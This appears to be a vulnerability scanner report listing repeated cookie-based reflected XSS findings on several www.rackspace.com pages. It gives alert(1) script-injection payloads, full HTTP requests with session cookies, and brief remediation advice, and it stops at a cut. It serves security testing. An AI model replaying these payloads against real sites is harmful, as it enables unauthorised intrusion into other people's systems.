The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77688"%3balert(1)//c63a589e70b was submitted in the chatslider cookie. This input was echoed as 77688";alert(1)//c63a589e70b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /partners/partnersearch.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D77688"%3balert(1)//c63a589e70b; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10e31"><script>alert(1)</script>1b755703283 was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /partners/partnersearch.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=rackspaceUS%3Aindex.php; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=1; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D10e31"><script>alert(1)</script>1b755703283; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1760"%3balert(1)//4e42ec6c367 was submitted in the IS_UASrackuid cookie. This input was echoed as a1760";alert(1)//4e42ec6c367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41da1760"%3balert(1)//4e42ec6c367; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2dec5"><script>alert(1)</script>6c5e22a6ae6 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d2dec5"><script>alert(1)</script>6c5e22a6ae6; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8b9a"%3balert(1)//2f050a2a0f8 was submitted in the chatslider cookie. This input was echoed as c8b9a";alert(1)//2f050a2a0f8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Ac8b9a"%3balert(1)//2f050a2a0f8; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9afc3"><script>alert(1)</script>d270610666f was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /searchresults.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A9afc3"><script>alert(1)</script>d270610666f; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e8e8"><script>alert(1)</script>a3bb3e2a670 was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f84e8e8"><script>alert(1)</script>a3bb3e2a670; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c486e"%3balert(1)//82d98daa8db was submitted in the IS_UASrackuid cookie. This input was echoed as c486e";alert(1)//82d98daa8db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8c486e"%3balert(1)//82d98daa8db; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:46:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 39275
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49409"><script>alert(1)</script>8d089914acf was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D49409"><script>alert(1)</script>8d089914acf; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea07"%3balert(1)//f6260c0da17 was submitted in the chatslider cookie. This input was echoed as 8ea07";alert(1)//f6260c0da17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US4da9da571af9d6d58e6c524219e4d7f8; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1_42442-1---1296919161_4-6_; _vis_opt_test_cookie=1; __utma=47003812.1362301340.1296919297.1296919297.1296919297.1; __utmc=47003812; exp_last_activity=1296937072; __utmb=47003812.1.10.1296919297; s_pv=rackspaceUS%3Awhyrackspace%3Anetwork%3Abandwidthbilling.php; rsea_cust=1; US4da9da571af9d6d58e6c524219e4d7f8_pagecount=2; __utmz=47003812.1296919297.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/2; keyword=cleanentry; s_sq=%5B%5BB%5D%5D; s_ppv=0; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=D8ea07"%3balert(1)//f6260c0da17; PHPSESSID=4da9da571af9d6d58e6c524219e4d7f8; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dff0"><script>alert(1)</script>414d2177ddc was submitted in the IS_UASrackuid cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /sitemap404.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d9dff0"><script>alert(1)</script>414d2177ddc; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the IS_UASrackuid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49edd"%3balert(1)//69feebe3346 was submitted in the IS_UASrackuid cookie. This input was echoed as 49edd";alert(1)//69feebe3346 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap404.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d49edd"%3balert(1)//69feebe3346; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc629"%3balert(1)//9e40bbd7211 was submitted in the chatslider cookie. This input was echoed as dc629";alert(1)//9e40bbd7211 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap404.php HTTP/1.1 Host: www.rackspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=Adc629"%3balert(1)//9e40bbd7211; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
The value of the chatslider cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb8e9"><script>alert(1)</script>9b077acfc1d was submitted in the chatslider cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
